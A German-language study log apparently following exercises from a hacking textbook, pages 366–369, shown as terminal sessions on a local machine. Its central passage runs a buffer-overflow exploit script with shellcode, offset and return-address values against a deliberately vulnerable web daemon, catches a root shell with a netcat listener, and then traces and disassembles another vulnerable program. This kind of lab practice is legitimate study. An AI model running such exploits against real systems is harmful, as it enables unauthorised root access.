root@tomovic-Satellite-L300:/# cat /var/log/tinywebd.log
09/08/2013 14:38:09> Starting up..
09/08/2013 14:38:29> From 127.0.0.1:45041 "HEAD / HTTP/1.0"  404 Not Found
09/08/2013 14:39:10> Shutting down..

Wichtig ist nur, dass „Starting up“ und „Shutting down“ drin sind. Bei mir fehlt die index.html :-)


Seite 366:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2548
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# jobs
[1]+  Läuft                  nc -l -p 31337 &
!!! Achtung: Bitte ändert bei euch die Werte in der .sh-Datei ab.
OFFSET=524
RETADDR="\x24\xf5\xff\xbf"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xtool_tinywebd_stealth.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (302 b)] [shellcode (83 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
root

 


09/11/2013 18:20:03> Starting up..
09/11/2013 18:22:54> Starting up..
09/11/2013 18:25:54> From 127.0.0.1:50224 "GET / HTTP/1.1"  404 Not Found

Hat doch ganz gut geklappt :-)

Seite 368:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace ./notetaker test
execve("./notetaker", ["./notetaker", "test"], [/* 19 vars */]) = 0
brk(0)                                  = 0x804b000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdb000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=71733, ...}) = 0
mmap2(NULL, 71733, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fc9000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220\232\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1770984, ...}) = 0
mmap2(NULL, 1780508, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e16000
mmap2(0xb7fc3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ad) = 0xb7fc3000
mmap2(0xb7fc6000, 11036, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc6000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e15000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e15900, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fc3000, 8192, PROT_READ)   = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0xb7ffe000, 4096, PROT_READ)   = 0
munmap(0xb7fc9000, 71733)               = 0
brk(0)                                  = 0x804b000
brk(0x806c000)                          = 0x806c000
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fda000
write(1, "[DEBUG] buffer   @ 0x804b008: 't"..., 37[DEBUG] buffer   @ 0x804b008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804b070: '/"..., 43[DEBUG] datafile @ 0x804b070: '/var/notes'
) = 43
open("/var/notes", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
write(1, "[DEBUG] file descriptor is 3\n", 29[DEBUG] file descriptor is 3
) = 29
getuid32()                              = 0
write(3, "\0\0\0\0", 4)                 = 4
write(3, "\n", 1)                       = 1
write(3, "test", 4)                     = 4
write(3, "\n", 1)                       = 1
close(3)                                = 0
write(1, "Note has been saved.\n", 21Note has been saved.
)  = 21
exit_group(0)                           = ?

Man sieht, dass über die Jahre viel am Kernel gearbeitet wurde.

Seite 369:


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./notetaker
Reading symbols from /home/tomovic/Dokumente/hack/notetaker...done.
(gdb) set dis intel
Ambiguous set command "dis intel": disable-randomization, disassemble-next-line, disassembly-flavor, disconnected-dprintf...
`set dis intel` ist nicht unbedingt notwendig; da gdb den Befehl als mehrdeutig ablehnt, bleibt die Ausgabe unten in AT&T-Syntax (die eindeutige Form wäre `set disassembly-flavor intel`).

(gdb) disass main
Dump of assembler code for function main:
   0x08048834 <+0>: push   %ebp
   0x08048835 <+1>: mov    %esp,%ebp
   0x08048837 <+3>: and    $0xfffffff0,%esp
   0x0804883a <+6>: sub    $0x20,%esp
   0x0804883d <+9>: movl   $0x64,(%esp)
   0x08048844 <+16>: call   0x80486ea <ec_malloc>
   0x08048849 <+21>: mov    %eax,0x1c(%esp)
   0x0804884d <+25>: movl   $0x14,(%esp)
   0x08048854 <+32>: call   0x80486ea <ec_malloc>
   0x08048859 <+37>: mov    %eax,0x18(%esp)
   0x0804885d <+41>: mov    0x18(%esp),%eax
   0x08048861 <+45>: movl   $0x7261762f,(%eax)
   0x08048867 <+51>: movl   $0x746f6e2f,0x4(%eax)
   0x0804886e <+58>: movw   $0x7365,0x8(%eax)
   0x08048874 <+64>: movb   $0x0,0xa(%eax)
   0x08048878 <+68>: cmpl   $0x1,0x8(%ebp)
   0x0804887c <+72>: jg     0x8048893 <main+95>
   0x0804887e <+74>: mov    0xc(%ebp),%eax
   0x08048881 <+77>: mov    (%eax),%eax
   0x08048883 <+79>: mov    0x18(%esp),%edx
   0x08048887 <+83>: mov    %edx,0x4(%esp)
   0x0804888b <+87>: mov    %eax,(%esp)
   0x0804888e <+90>: call   0x8048808 <usage>
   0x08048893 <+95>: mov    0xc(%ebp),%eax
   0x08048896 <+98>: add    $0x4,%eax
   0x08048899 <+101>: mov    (%eax),%eax
   0x0804889b <+103>: mov    %eax,0x4(%esp)
   0x0804889f <+107>: mov    0x1c(%esp),%eax
   0x080488a3 <+111>: mov    %eax,(%esp)
   0x080488a6 <+114>: call   0x80484d0 <strcpy@plt>
   0x080488ab <+119>: mov    0x1c(%esp),%eax
   0x080488af <+123>: mov    %eax,0x8(%esp)
   0x080488b3 <+127>: mov    0x1c(%esp),%eax
   0x080488b7 <+131>: mov    %eax,0x4(%esp)
   0x080488bb <+135>: movl   $0x8048af3,(%esp)
   0x080488c2 <+142>: call   0x8048490 <printf@plt>
   0x080488c7 <+147>: mov    0x18(%esp),%eax
   0x080488cb <+151>: mov    %eax,0x8(%esp)
   0x080488cf <+155>: mov    0x18(%esp),%eax
   0x080488d3 <+159>: mov    %eax,0x4(%esp)
   0x080488d7 <+163>: movl   $0x8048b10,(%esp)
   0x080488de <+170>: call   0x8048490 <printf@plt>
   0x080488e3 <+175>: movl   $0x180,0x8(%esp)
---Type <return> to continue, or q <return> to quit---^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

 


 

   
